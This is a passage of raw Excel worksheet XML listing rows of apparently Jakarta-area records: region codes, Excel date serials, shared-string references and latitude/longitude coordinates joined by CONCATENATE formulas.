      <c r="U1781" s="5">
        <v>10690914</v>
      </c>
      <c r="V1781" s="5" t="s">
        <v>16063</v>
      </c>
      <c r="W1781" s="5">
        <v>-616910</v>
      </c>
      <c r="X1781" t="s">
        <v>19825</v>
      </c>
      <c r="Y1781" t="str">
        <f t="shared" si="27"/>
        <v>-6.16910,106.90914</v>
      </c>
    </row>
    <row r="1782" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1782">
        <v>109309</v>
      </c>
      <c r="B1782" s="1">
        <v>43886</v>
      </c>
      <c r="C1782">
        <v>0</v>
      </c>
      <c r="D1782" t="s">
        <v>22</v>
      </c>
      <c r="E1782" t="s">
        <v>23</v>
      </c>
      <c r="F1782" t="s">
        <v>6088</v>
      </c>
      <c r="G1782" t="s">
        <v>6089</v>
      </c>
      <c r="H1782" t="s">
        <v>26</v>
      </c>
      <c r="I1782" t="s">
        <v>1689</v>
      </c>
      <c r="J1782" t="s">
        <v>6090</v>
      </c>
      <c r="L1782" t="s">
        <v>6091</v>
      </c>
      <c r="M1782">
        <v>3173040003</v>
      </c>
      <c r="N1782">
        <v>3173040</v>
      </c>
      <c r="O1782">
        <v>3173</v>
      </c>
      <c r="P1782">
        <v>31</v>
      </c>
      <c r="Q1782" t="s">
        <v>2346</v>
      </c>
      <c r="R1782" t="s">
        <v>1598</v>
      </c>
      <c r="S1782" t="s">
        <v>62</v>
      </c>
      <c r="T1782" t="s">
        <v>33</v>
      </c>
      <c r="U1782" s="5">
        <v>10684719</v>
      </c>
      <c r="V1782" s="5" t="s">
        <v>16064</v>
      </c>
      <c r="W1782" s="5">
        <v>-617510</v>
      </c>
      <c r="X1782" t="s">
        <v>18382</v>
      </c>
      <c r="Y1782" t="str">
        <f t="shared" si="27"/>
        <v>-6.17510,106.84719</v>
      </c>
    </row>
    <row r="1783" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1783">
        <v>109310</v>
      </c>
      <c r="B1783" s="1">
        <v>43886</v>
      </c>
      <c r="C1783">
        <v>0</v>
      </c>
      <c r="D1783" t="s">
        <v>22</v>
      </c>
      <c r="E1783" t="s">
        <v>23</v>
      </c>
      <c r="F1783" t="s">
        <v>6092</v>
      </c>
      <c r="H1783" t="s">
        <v>26</v>
      </c>
      <c r="I1783" t="s">
        <v>6093</v>
      </c>
      <c r="J1783" t="s">
        <v>6094</v>
      </c>
      <c r="L1783" t="s">
        <v>6095</v>
      </c>
      <c r="M1783">
        <v>3173080001</v>
      </c>
      <c r="N1783">
        <v>3173080</v>
      </c>
      <c r="O1783">
        <v>3173</v>
      </c>
      <c r="P1783">
        <v>31</v>
      </c>
      <c r="Q1783" t="s">
        <v>156</v>
      </c>
      <c r="R1783" t="s">
        <v>157</v>
      </c>
      <c r="S1783" t="s">
        <v>62</v>
      </c>
      <c r="T1783" t="s">
        <v>33</v>
      </c>
      <c r="U1783" s="5">
        <v>10680806</v>
      </c>
      <c r="V1783" s="5" t="s">
        <v>16065</v>
      </c>
      <c r="W1783" s="5">
        <v>-617178</v>
      </c>
      <c r="X1783" t="s">
        <v>19826</v>
      </c>
      <c r="Y1783" t="str">
        <f t="shared" si="27"/>
        <v>-6.17178,106.80806</v>
      </c>
    </row>
    <row r="1784" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1784">
        <v>109311</v>
      </c>
      <c r="B1784" s="1">
        <v>43886</v>
      </c>
      <c r="C1784">
        <v>0</v>
      </c>
      <c r="D1784" t="s">
        <v>22</v>
      </c>
      <c r="E1784" t="s">
        <v>23</v>
      </c>
      <c r="F1784" t="s">
        <v>6096</v>
      </c>
      <c r="G1784" t="s">
        <v>6097</v>
      </c>
      <c r="H1784" t="s">
        <v>26</v>
      </c>
      <c r="I1784" t="s">
        <v>3603</v>
      </c>
      <c r="J1784" t="s">
        <v>846</v>
      </c>
      <c r="L1784" t="s">
        <v>6098</v>
      </c>
      <c r="M1784">
        <v>3174070002</v>
      </c>
      <c r="N1784">
        <v>3174070</v>
      </c>
      <c r="O1784">
        <v>3174</v>
      </c>
      <c r="P1784">
        <v>31</v>
      </c>
      <c r="Q1784" t="s">
        <v>621</v>
      </c>
      <c r="R1784" t="s">
        <v>84</v>
      </c>
      <c r="S1784" t="s">
        <v>32</v>
      </c>
      <c r="T1784" t="s">
        <v>33</v>
      </c>
      <c r="U1784" s="5">
        <v>10674017</v>
      </c>
      <c r="V1784" s="5" t="s">
        <v>16066</v>
      </c>
      <c r="W1784" s="5">
        <v>-616630</v>
      </c>
      <c r="X1784" t="s">
        <v>19827</v>
      </c>
      <c r="Y1784" t="str">
        <f t="shared" si="27"/>
        <v>-6.16630,106.74017</v>
      </c>
    </row>
    <row r="1785" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1785">
        <v>109312</v>
      </c>
      <c r="B1785" s="1">
        <v>43886</v>
      </c>
      <c r="C1785">
        <v>0</v>
      </c>
      <c r="D1785" t="s">
        <v>22</v>
      </c>
      <c r="E1785" t="s">
        <v>23</v>
      </c>
      <c r="F1785" t="s">
        <v>6099</v>
      </c>
      <c r="H1785" t="s">
        <v>26</v>
      </c>
      <c r="I1785" t="s">
        <v>1651</v>
      </c>
      <c r="J1785" t="s">
        <v>45</v>
      </c>
      <c r="L1785" t="s">
        <v>6100</v>
      </c>
      <c r="M1785">
        <v>3172060004</v>
      </c>
      <c r="N1785">
        <v>3172060</v>
      </c>
      <c r="O1785">
        <v>3172</v>
      </c>
      <c r="P1785">
        <v>31</v>
      </c>
      <c r="Q1785" t="s">
        <v>47</v>
      </c>
      <c r="R1785" t="s">
        <v>48</v>
      </c>
      <c r="S1785" t="s">
        <v>49</v>
      </c>
      <c r="T1785" t="s">
        <v>33</v>
      </c>
      <c r="U1785" s="5">
        <v>10689018</v>
      </c>
      <c r="V1785" s="5" t="s">
        <v>16067</v>
      </c>
      <c r="W1785" s="5">
        <v>-623501</v>
      </c>
      <c r="X1785" t="s">
        <v>19581</v>
      </c>
      <c r="Y1785" t="str">
        <f t="shared" si="27"/>
        <v>-6.23501,106.89018</v>
      </c>
    </row>
    <row r="1786" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1786">
        <v>109313</v>
      </c>
      <c r="B1786" s="1">
        <v>43886</v>
      </c>
      <c r="C1786">
        <v>0</v>
      </c>
      <c r="D1786" t="s">
        <v>22</v>
      </c>
      <c r="E1786" t="s">
        <v>23</v>
      </c>
      <c r="F1786" t="s">
        <v>6101</v>
      </c>
      <c r="G1786" t="s">
        <v>6102</v>
      </c>
      <c r="H1786" t="s">
        <v>26</v>
      </c>
      <c r="I1786" t="s">
        <v>4118</v>
      </c>
      <c r="J1786" t="s">
        <v>444</v>
      </c>
      <c r="L1786" t="s">
        <v>6103</v>
      </c>
      <c r="M1786">
        <v>3174020005</v>
      </c>
      <c r="N1786">
        <v>3174020</v>
      </c>
      <c r="O1786">
        <v>3174</v>
      </c>
      <c r="P1786">
        <v>31</v>
      </c>
      <c r="Q1786" t="s">
        <v>30</v>
      </c>
      <c r="R1786" t="s">
        <v>31</v>
      </c>
      <c r="S1786" t="s">
        <v>32</v>
      </c>
      <c r="T1786" t="s">
        <v>33</v>
      </c>
      <c r="U1786" s="5">
        <v>10677369</v>
      </c>
      <c r="V1786" s="5" t="s">
        <v>16068</v>
      </c>
      <c r="W1786" s="5">
        <v>-617451</v>
      </c>
      <c r="X1786" t="s">
        <v>19828</v>
      </c>
      <c r="Y1786" t="str">
        <f t="shared" si="27"/>
        <v>-6.17451,106.77369</v>
      </c>
    </row>
    <row r="1787" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1787">
        <v>109314</v>
      </c>
      <c r="B1787" s="1">
        <v>43886</v>
      </c>
      <c r="C1787">
        <v>0</v>
      </c>
      <c r="D1787" t="s">
        <v>22</v>
      </c>
      <c r="E1787" t="s">
        <v>23</v>
      </c>
      <c r="F1787" t="s">
        <v>6104</v>
      </c>
      <c r="G1787" t="s">
        <v>6105</v>
      </c>
      <c r="H1787" t="s">
        <v>26</v>
      </c>
      <c r="I1787" t="s">
        <v>6106</v>
      </c>
      <c r="J1787" t="s">
        <v>4337</v>
      </c>
      <c r="M1787">
        <v>3171100001</v>
      </c>
      <c r="N1787">
        <v>3171100</v>
      </c>
      <c r="O1787">
        <v>3171</v>
      </c>
      <c r="P1787">
        <v>31</v>
      </c>
      <c r="Q1787" t="s">
        <v>1474</v>
      </c>
      <c r="R1787" t="s">
        <v>107</v>
      </c>
      <c r="S1787" t="s">
        <v>108</v>
      </c>
      <c r="T1787" t="s">
        <v>33</v>
      </c>
      <c r="U1787" s="5">
        <v>10681794</v>
      </c>
      <c r="V1787" s="5" t="s">
        <v>16069</v>
      </c>
      <c r="W1787" s="5">
        <v>-622224</v>
      </c>
      <c r="X1787" t="s">
        <v>18404</v>
      </c>
      <c r="Y1787" t="str">
        <f t="shared" si="27"/>
        <v>-6.22224,106.81794</v>
      </c>
    </row>
    <row r="1788" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1788">
        <v>109315</v>
      </c>
      <c r="B1788" s="1">
        <v>43886</v>
      </c>
      <c r="C1788">
        <v>0</v>
      </c>
      <c r="D1788" t="s">
        <v>22</v>
      </c>
      <c r="E1788" t="s">
        <v>23</v>
      </c>
      <c r="F1788" t="s">
        <v>6107</v>
      </c>
      <c r="G1788" t="s">
        <v>6108</v>
      </c>
      <c r="H1788" t="s">
        <v>26</v>
      </c>
      <c r="I1788" t="s">
        <v>2962</v>
      </c>
      <c r="J1788" t="s">
        <v>1035</v>
      </c>
      <c r="L1788" t="s">
        <v>6109</v>
      </c>
      <c r="M1788">
        <v>3175050001</v>
      </c>
      <c r="N1788">
        <v>3175050</v>
      </c>
      <c r="O1788">
        <v>3175</v>
      </c>
      <c r="P1788">
        <v>31</v>
      </c>
      <c r="Q1788" t="s">
        <v>1037</v>
      </c>
      <c r="R1788" t="s">
        <v>1013</v>
      </c>
      <c r="S1788" t="s">
        <v>547</v>
      </c>
      <c r="T1788" t="s">
        <v>33</v>
      </c>
      <c r="U1788" s="5">
        <v>10689320</v>
      </c>
      <c r="V1788" s="5" t="s">
        <v>16070</v>
      </c>
      <c r="W1788" s="5">
        <v>-615506</v>
      </c>
      <c r="X1788" t="s">
        <v>19829</v>
      </c>
      <c r="Y1788" t="str">
        <f t="shared" si="27"/>
        <v>-6.15506,106.89320</v>
      </c>
    </row>
    <row r="1789" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1789">
        <v>109316</v>
      </c>
      <c r="B1789" s="1">
        <v>43886</v>
      </c>
      <c r="C1789">
        <v>0</v>
      </c>
      <c r="D1789" t="s">
        <v>22</v>
      </c>
      <c r="E1789" t="s">
        <v>23</v>
      </c>
      <c r="F1789" t="s">
        <v>6110</v>
      </c>
      <c r="G1789" t="s">
        <v>6111</v>
      </c>
      <c r="H1789" t="s">
        <v>26</v>
      </c>
      <c r="I1789" t="s">
        <v>4350</v>
      </c>
      <c r="J1789" t="s">
        <v>2627</v>
      </c>
      <c r="L1789" t="s">
        <v>6112</v>
      </c>
      <c r="M1789">
        <v>3216082004</v>
      </c>
      <c r="N1789">
        <v>3216082</v>
      </c>
      <c r="O1789">
        <v>3216</v>
      </c>
      <c r="P1789">
        <v>32</v>
      </c>
      <c r="Q1789" t="s">
        <v>5842</v>
      </c>
      <c r="R1789" t="s">
        <v>601</v>
      </c>
      <c r="S1789" t="s">
        <v>41</v>
      </c>
      <c r="T1789" t="s">
        <v>42</v>
      </c>
      <c r="U1789" s="5">
        <v>10705464</v>
      </c>
      <c r="V1789" s="5" t="s">
        <v>16071</v>
      </c>
      <c r="W1789" s="5">
        <v>-619358</v>
      </c>
      <c r="X1789" t="s">
        <v>19830</v>
      </c>
      <c r="Y1789" t="str">
        <f t="shared" si="27"/>
        <v>-6.19358,107.05464</v>
      </c>
    </row>
    <row r="1790" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1790">
        <v>109317</v>
      </c>
      <c r="B1790" s="1">
        <v>43886</v>
      </c>
      <c r="C1790">
        <v>0</v>
      </c>
      <c r="D1790" t="s">
        <v>22</v>
      </c>
      <c r="E1790" t="s">
        <v>23</v>
      </c>
      <c r="F1790" t="s">
        <v>6113</v>
      </c>
      <c r="G1790" t="s">
        <v>6114</v>
      </c>
      <c r="H1790" t="s">
        <v>26</v>
      </c>
      <c r="I1790" t="s">
        <v>974</v>
      </c>
      <c r="J1790" t="s">
        <v>2627</v>
      </c>
      <c r="M1790">
        <v>3275050002</v>
      </c>
      <c r="N1790">
        <v>3275050</v>
      </c>
      <c r="O1790">
        <v>3275</v>
      </c>
      <c r="P1790">
        <v>32</v>
      </c>
      <c r="Q1790" t="s">
        <v>2245</v>
      </c>
      <c r="R1790" t="s">
        <v>955</v>
      </c>
      <c r="S1790" t="s">
        <v>41</v>
      </c>
      <c r="T1790" t="s">
        <v>42</v>
      </c>
      <c r="U1790" s="5">
        <v>10697184</v>
      </c>
      <c r="V1790" s="5" t="s">
        <v>16072</v>
      </c>
      <c r="W1790" s="5">
        <v>-626304</v>
      </c>
      <c r="X1790" t="s">
        <v>19831</v>
      </c>
      <c r="Y1790" t="str">
        <f t="shared" si="27"/>
        <v>-6.26304,106.97184</v>
      </c>
    </row>
    <row r="1791" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1791">
        <v>109318</v>
      </c>
      <c r="B1791" s="1">
        <v>43886</v>
      </c>
      <c r="C1791">
        <v>0</v>
      </c>
      <c r="D1791" t="s">
        <v>22</v>
      </c>
      <c r="E1791" t="s">
        <v>23</v>
      </c>
      <c r="F1791" t="s">
        <v>6115</v>
      </c>
      <c r="G1791" t="s">
        <v>6116</v>
      </c>
      <c r="H1791" t="s">
        <v>26</v>
      </c>
      <c r="I1791" t="s">
        <v>1055</v>
      </c>
      <c r="J1791" t="s">
        <v>1694</v>
      </c>
      <c r="L1791" t="s">
        <v>6117</v>
      </c>
      <c r="M1791">
        <v>3174080004</v>
      </c>
      <c r="N1791">
        <v>3174080</v>
      </c>
      <c r="O1791">
        <v>3174</v>
      </c>
      <c r="P1791">
        <v>31</v>
      </c>
      <c r="Q1791" t="s">
        <v>1696</v>
      </c>
      <c r="R1791" t="s">
        <v>695</v>
      </c>
      <c r="S1791" t="s">
        <v>32</v>
      </c>
      <c r="T1791" t="s">
        <v>33</v>
      </c>
      <c r="U1791" s="5">
        <v>10671215</v>
      </c>
      <c r="V1791" s="5" t="s">
        <v>16073</v>
      </c>
      <c r="W1791" s="5">
        <v>-611464</v>
      </c>
      <c r="X1791" t="s">
        <v>19832</v>
      </c>
      <c r="Y1791" t="str">
        <f t="shared" si="27"/>
        <v>-6.11464,106.71215</v>
      </c>
    </row>
    <row r="1792" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1792">
        <v>109319</v>
      </c>
      <c r="B1792" s="1">
        <v>43886</v>
      </c>
      <c r="C1792">
        <v>0</v>
      </c>
      <c r="D1792" t="s">
        <v>22</v>
      </c>
      <c r="E1792" t="s">
        <v>23</v>
      </c>
      <c r="F1792" t="s">
        <v>6118</v>
      </c>
      <c r="G1792" t="s">
        <v>6119</v>
      </c>
      <c r="H1792" t="s">
        <v>26</v>
      </c>
      <c r="I1792" t="s">
        <v>5022</v>
      </c>
      <c r="J1792" t="s">
        <v>1152</v>
      </c>
      <c r="M1792">
        <v>3173070001</v>
      </c>
      <c r="N1792">
        <v>3173070</v>
      </c>
      <c r="O1792">
        <v>3173</v>
      </c>
      <c r="P1792">
        <v>31</v>
      </c>
      <c r="Q1792" t="s">
        <v>322</v>
      </c>
      <c r="R1792" t="s">
        <v>323</v>
      </c>
      <c r="S1792" t="s">
        <v>62</v>
      </c>
      <c r="T1792" t="s">
        <v>33</v>
      </c>
      <c r="U1792" s="5">
        <v>10683671</v>
      </c>
      <c r="V1792" s="5" t="s">
        <v>14583</v>
      </c>
      <c r="W1792" s="5">
        <v>-616488</v>
      </c>
      <c r="X1792" t="s">
        <v>19833</v>
      </c>
      <c r="Y1792" t="str">
        <f t="shared" si="27"/>
        <v>-6.16488,106.83671</v>
      </c>
    </row>
    <row r="1793" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1793">
        <v>109320</v>
      </c>
      <c r="B1793" s="1">
        <v>43886</v>
      </c>
      <c r="C1793">
        <v>0</v>
      </c>
      <c r="D1793" t="s">
        <v>22</v>
      </c>
      <c r="E1793" t="s">
        <v>23</v>
      </c>
      <c r="F1793" t="s">
        <v>6120</v>
      </c>
      <c r="G1793" t="s">
        <v>6121</v>
      </c>
      <c r="H1793" t="s">
        <v>26</v>
      </c>
      <c r="I1793" t="s">
        <v>3632</v>
      </c>
      <c r="J1793" t="s">
        <v>3135</v>
      </c>
      <c r="L1793" t="s">
        <v>6122</v>
      </c>
      <c r="M1793">
        <v>3671012001</v>
      </c>
      <c r="N1793">
        <v>3671012</v>
      </c>
      <c r="O1793">
        <v>3671</v>
      </c>
      <c r="P1793">
        <v>36</v>
      </c>
      <c r="Q1793" t="s">
        <v>759</v>
      </c>
      <c r="R1793" t="s">
        <v>760</v>
      </c>
      <c r="S1793" t="s">
        <v>201</v>
      </c>
      <c r="T1793" t="s">
        <v>171</v>
      </c>
      <c r="U1793" s="5">
        <v>10669794</v>
      </c>
      <c r="V1793" s="5" t="s">
        <v>16074</v>
      </c>
      <c r="W1793" s="5">
        <v>-622576</v>
      </c>
      <c r="X1793" t="s">
        <v>19834</v>
      </c>
      <c r="Y1793" t="str">
        <f t="shared" si="27"/>
        <v>-6.22576,106.69794</v>
      </c>
    </row>
    <row r="1794" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1794">
        <v>109321</v>
      </c>
      <c r="B1794" s="1">
        <v>43886</v>
      </c>
      <c r="C1794">
        <v>0</v>
      </c>
      <c r="D1794" t="s">
        <v>22</v>
      </c>
      <c r="E1794" t="s">
        <v>23</v>
      </c>
      <c r="F1794" t="s">
        <v>6123</v>
      </c>
      <c r="G1794" t="s">
        <v>6124</v>
      </c>
      <c r="H1794" t="s">
        <v>26</v>
      </c>
      <c r="I1794" t="s">
        <v>523</v>
      </c>
      <c r="J1794" t="s">
        <v>1355</v>
      </c>
      <c r="L1794" t="s">
        <v>250</v>
      </c>
      <c r="M1794">
        <v>3174070002</v>
      </c>
      <c r="N1794">
        <v>3174070</v>
      </c>
      <c r="O1794">
        <v>3174</v>
      </c>
      <c r="P1794">
        <v>31</v>
      </c>
      <c r="Q1794" t="s">
        <v>621</v>
      </c>
      <c r="R1794" t="s">
        <v>84</v>
      </c>
      <c r="S1794" t="s">
        <v>32</v>
      </c>
      <c r="T1794" t="s">
        <v>33</v>
      </c>
      <c r="U1794" s="5">
        <v>10674659</v>
      </c>
      <c r="V1794" s="5" t="s">
        <v>16075</v>
      </c>
      <c r="W1794" s="5">
        <v>-615929</v>
      </c>
      <c r="X1794" t="s">
        <v>19196</v>
      </c>
      <c r="Y1794" t="str">
        <f t="shared" si="27"/>
        <v>-6.15929,106.74659</v>
      </c>
    </row>
    <row r="1795" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1795">
        <v>109322</v>
      </c>
      <c r="B1795" s="1">
        <v>43886</v>
      </c>
      <c r="C1795">
        <v>0</v>
      </c>
      <c r="D1795" t="s">
        <v>22</v>
      </c>
      <c r="E1795" t="s">
        <v>23</v>
      </c>
      <c r="F1795" t="s">
        <v>6125</v>
      </c>
      <c r="G1795" t="s">
        <v>6126</v>
      </c>
      <c r="H1795" t="s">
        <v>26</v>
      </c>
      <c r="I1795" t="s">
        <v>639</v>
      </c>
      <c r="J1795" t="s">
        <v>5026</v>
      </c>
      <c r="M1795">
        <v>3171060004</v>
      </c>
      <c r="N1795">
        <v>3171060</v>
      </c>
      <c r="O1795">
        <v>3171</v>
      </c>
      <c r="P1795">
        <v>31</v>
      </c>
      <c r="Q1795" t="s">
        <v>5027</v>
      </c>
      <c r="R1795" t="s">
        <v>1236</v>
      </c>
      <c r="S1795" t="s">
        <v>108</v>
      </c>
      <c r="T1795" t="s">
        <v>33</v>
      </c>
      <c r="U1795" s="5">
        <v>10681068</v>
      </c>
      <c r="V1795" s="5" t="s">
        <v>16076</v>
      </c>
      <c r="W1795" s="5">
        <v>-624597</v>
      </c>
      <c r="X1795" t="s">
        <v>19835</v>
      </c>
      <c r="Y1795" t="str">
        <f t="shared" ref="Y1795:Y1858" si="28">CONCATENATE(X1795,",",V1795)</f>
        <v>-6.24597,106.81068</v>
      </c>
    </row>
    <row r="1796" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1796">
        <v>109323</v>
      </c>
      <c r="B1796" s="1">
        <v>43886</v>
      </c>
      <c r="C1796">
        <v>0</v>
      </c>
      <c r="D1796" t="s">
        <v>22</v>
      </c>
      <c r="E1796" t="s">
        <v>23</v>
      </c>
      <c r="F1796" t="s">
        <v>6127</v>
      </c>
      <c r="H1796" t="s">
        <v>26</v>
      </c>
      <c r="I1796" t="s">
        <v>166</v>
      </c>
      <c r="J1796" t="s">
        <v>2627</v>
      </c>
      <c r="L1796" t="s">
        <v>6128</v>
      </c>
      <c r="M1796">
        <v>3216082002</v>
      </c>
      <c r="N1796">
        <v>3216082</v>
      </c>
      <c r="O1796">
        <v>3216</v>
      </c>
      <c r="P1796">
        <v>32</v>
      </c>
      <c r="Q1796" t="s">
        <v>1273</v>
      </c>
      <c r="R1796" t="s">
        <v>601</v>
      </c>
      <c r="S1796" t="s">
        <v>41</v>
      </c>
      <c r="T1796" t="s">
        <v>42</v>
      </c>
      <c r="U1796" s="5">
        <v>10706067</v>
      </c>
      <c r="V1796" s="5" t="s">
        <v>16077</v>
      </c>
      <c r="W1796" s="5">
        <v>-621777</v>
      </c>
      <c r="X1796" t="s">
        <v>19836</v>
      </c>
      <c r="Y1796" t="str">
        <f t="shared" si="28"/>
        <v>-6.21777,107.06067</v>
      </c>
    </row>
    <row r="1797" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1797">
        <v>109324</v>
      </c>
      <c r="B1797" s="1">
        <v>43886</v>
      </c>
      <c r="C1797">
        <v>0</v>
      </c>
      <c r="D1797" t="s">
        <v>22</v>
      </c>
      <c r="E1797" t="s">
        <v>23</v>
      </c>
      <c r="F1797" t="s">
        <v>6129</v>
      </c>
      <c r="G1797" t="s">
        <v>6130</v>
      </c>
      <c r="H1797" t="s">
        <v>26</v>
      </c>
      <c r="I1797" t="s">
        <v>332</v>
      </c>
      <c r="J1797" t="s">
        <v>2627</v>
      </c>
      <c r="L1797" t="s">
        <v>6131</v>
      </c>
      <c r="M1797">
        <v>3216081010</v>
      </c>
      <c r="N1797">
        <v>3216081</v>
      </c>
      <c r="O1797">
        <v>3216</v>
      </c>
      <c r="P1797">
        <v>32</v>
      </c>
      <c r="Q1797" t="s">
        <v>6132</v>
      </c>
      <c r="R1797" t="s">
        <v>2512</v>
      </c>
      <c r="S1797" t="s">
        <v>41</v>
      </c>
      <c r="T1797" t="s">
        <v>42</v>
      </c>
      <c r="U1797" s="5">
        <v>10708763</v>
      </c>
      <c r="V1797" s="5" t="s">
        <v>16078</v>
      </c>
      <c r="W1797" s="5">
        <v>-623733</v>
      </c>
      <c r="X1797" t="s">
        <v>19837</v>
      </c>
      <c r="Y1797" t="str">
        <f t="shared" si="28"/>
        <v>-6.23733,107.08763</v>
      </c>
    </row>
    <row r="1798" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1798">
        <v>109325</v>
      </c>
      <c r="B1798" s="1">
        <v>43886</v>
      </c>
      <c r="C1798">
        <v>0</v>
      </c>
      <c r="D1798" t="s">
        <v>85</v>
      </c>
      <c r="E1798" t="s">
        <v>23</v>
      </c>
      <c r="F1798" t="s">
        <v>6133</v>
      </c>
      <c r="G1798" t="s">
        <v>6134</v>
      </c>
      <c r="H1798" t="s">
        <v>26</v>
      </c>
      <c r="I1798" t="s">
        <v>103</v>
      </c>
      <c r="J1798" t="s">
        <v>6135</v>
      </c>
      <c r="K1798" t="s">
        <v>6136</v>
      </c>
      <c r="L1798" t="s">
        <v>6137</v>
      </c>
      <c r="M1798">
        <v>3172050007</v>
      </c>
      <c r="N1798">
        <v>3172050</v>
      </c>
      <c r="O1798">
        <v>3172</v>
      </c>
      <c r="P1798">
        <v>31</v>
      </c>
      <c r="Q1798" t="s">
        <v>1673</v>
      </c>
      <c r="R1798" t="s">
        <v>358</v>
      </c>
      <c r="S1798" t="s">
        <v>49</v>
      </c>
      <c r="T1798" t="s">
        <v>33</v>
      </c>
      <c r="U1798" s="5">
        <v>10687064</v>
      </c>
      <c r="V1798" s="5" t="s">
        <v>16079</v>
      </c>
      <c r="W1798" s="5">
        <v>-624720</v>
      </c>
      <c r="X1798" t="s">
        <v>19449</v>
      </c>
      <c r="Y1798" t="str">
        <f t="shared" si="28"/>
        <v>-6.24720,106.87064</v>
      </c>
    </row>
    <row r="1799" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1799">
        <v>109326</v>
      </c>
      <c r="B1799" s="1">
        <v>43886</v>
      </c>
      <c r="C1799">
        <v>0</v>
      </c>
      <c r="D1799" t="s">
        <v>85</v>
      </c>
      <c r="E1799" t="s">
        <v>23</v>
      </c>
      <c r="F1799" t="s">
        <v>6138</v>
      </c>
      <c r="G1799" t="s">
        <v>6139</v>
      </c>
      <c r="H1799" t="s">
        <v>26</v>
      </c>
      <c r="I1799" t="s">
        <v>103</v>
      </c>
      <c r="J1799" t="s">
        <v>2627</v>
      </c>
      <c r="K1799" t="s">
        <v>6140</v>
      </c>
      <c r="L1799" t="s">
        <v>6141</v>
      </c>
      <c r="M1799">
        <v>3216090002</v>
      </c>
      <c r="N1799">
        <v>3216090</v>
      </c>
      <c r="O1799">
        <v>3216</v>
      </c>
      <c r="P1799">
        <v>32</v>
      </c>
      <c r="Q1799" t="s">
        <v>6142</v>
      </c>
      <c r="R1799" t="s">
        <v>335</v>
      </c>
      <c r="S1799" t="s">
        <v>41</v>
      </c>
      <c r="T1799" t="s">
        <v>42</v>
      </c>
      <c r="U1799" s="5">
        <v>10703484</v>
      </c>
      <c r="V1799" s="5" t="s">
        <v>16080</v>
      </c>
      <c r="W1799" s="5">
        <v>-617452</v>
      </c>
      <c r="X1799" t="s">
        <v>19838</v>
      </c>
      <c r="Y1799" t="str">
        <f t="shared" si="28"/>
        <v>-6.17452,107.03484</v>
      </c>
    </row>
    <row r="1800" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1800">
        <v>109327</v>
      </c>
      <c r="B1800" s="1">
        <v>43886</v>
      </c>
      <c r="C1800">
        <v>0</v>
      </c>
      <c r="D1800" t="s">
        <v>22</v>
      </c>
      <c r="E1800" t="s">
        <v>23</v>
      </c>
      <c r="F1800" t="s">
        <v>6143</v>
      </c>
      <c r="H1800" t="s">
        <v>26</v>
      </c>
      <c r="I1800" t="s">
        <v>6144</v>
      </c>
      <c r="J1800" t="s">
        <v>1471</v>
      </c>
      <c r="L1800" t="s">
        <v>6145</v>
      </c>
      <c r="M1800">
        <v>3171100001</v>
      </c>
      <c r="N1800">
        <v>3171100</v>
      </c>
      <c r="O1800">
        <v>3171</v>
      </c>
      <c r="P1800">
        <v>31</v>
      </c>
      <c r="Q1800" t="s">
        <v>1474</v>
      </c>
      <c r="R1800" t="s">
        <v>107</v>
      </c>
      <c r="S1800" t="s">
        <v>108</v>
      </c>
      <c r="T1800" t="s">
        <v>33</v>
      </c>
      <c r="U1800" s="5">
        <v>10681399</v>
      </c>
      <c r="V1800" s="5" t="s">
        <v>16081</v>
      </c>
      <c r="W1800" s="5">
        <v>-621935</v>
      </c>
      <c r="X1800" t="s">
        <v>19839</v>
      </c>
      <c r="Y1800" t="str">
        <f t="shared" si="28"/>
        <v>-6.21935,106.81399</v>
      </c>
    </row>
    <row r="1801" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1801">
        <v>109328</v>
      </c>
      <c r="B1801" s="1">
        <v>43886</v>
      </c>
      <c r="C1801">
        <v>0</v>
      </c>
      <c r="D1801" t="s">
        <v>22</v>
      </c>
      <c r="E1801" t="s">
        <v>23</v>
      </c>
      <c r="F1801" t="s">
        <v>6146</v>
      </c>
      <c r="G1801" t="s">
        <v>6147</v>
      </c>
      <c r="H1801" t="s">
        <v>26</v>
      </c>
      <c r="I1801" t="s">
        <v>271</v>
      </c>
      <c r="J1801" t="s">
        <v>5887</v>
      </c>
      <c r="L1801" t="s">
        <v>6148</v>
      </c>
      <c r="M1801">
        <v>3172070002</v>
      </c>
      <c r="N1801">
        <v>3172070</v>
      </c>
      <c r="O1801">
        <v>3172</v>
      </c>
      <c r="P1801">
        <v>31</v>
      </c>
      <c r="Q1801" t="s">
        <v>128</v>
      </c>
      <c r="R1801" t="s">
        <v>128</v>
      </c>
      <c r="S1801" t="s">
        <v>49</v>
      </c>
      <c r="T1801" t="s">
        <v>33</v>
      </c>
      <c r="U1801" s="5">
        <v>10691342</v>
      </c>
      <c r="V1801" s="5" t="s">
        <v>16082</v>
      </c>
      <c r="W1801" s="5">
        <v>-623415</v>
      </c>
      <c r="X1801" t="s">
        <v>19464</v>
      </c>
      <c r="Y1801" t="str">
        <f t="shared" si="28"/>
        <v>-6.23415,106.91342</v>
      </c>
    </row>
    <row r="1802" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1802">
        <v>109329</v>
      </c>
      <c r="B1802" s="1">
        <v>43886</v>
      </c>
      <c r="C1802">
        <v>0</v>
      </c>
      <c r="D1802" t="s">
        <v>22</v>
      </c>
      <c r="E1802" t="s">
        <v>23</v>
      </c>
      <c r="F1802" t="s">
        <v>6149</v>
      </c>
      <c r="G1802" t="s">
        <v>6150</v>
      </c>
      <c r="H1802" t="s">
        <v>26</v>
      </c>
      <c r="I1802" t="s">
        <v>72</v>
      </c>
      <c r="J1802" t="s">
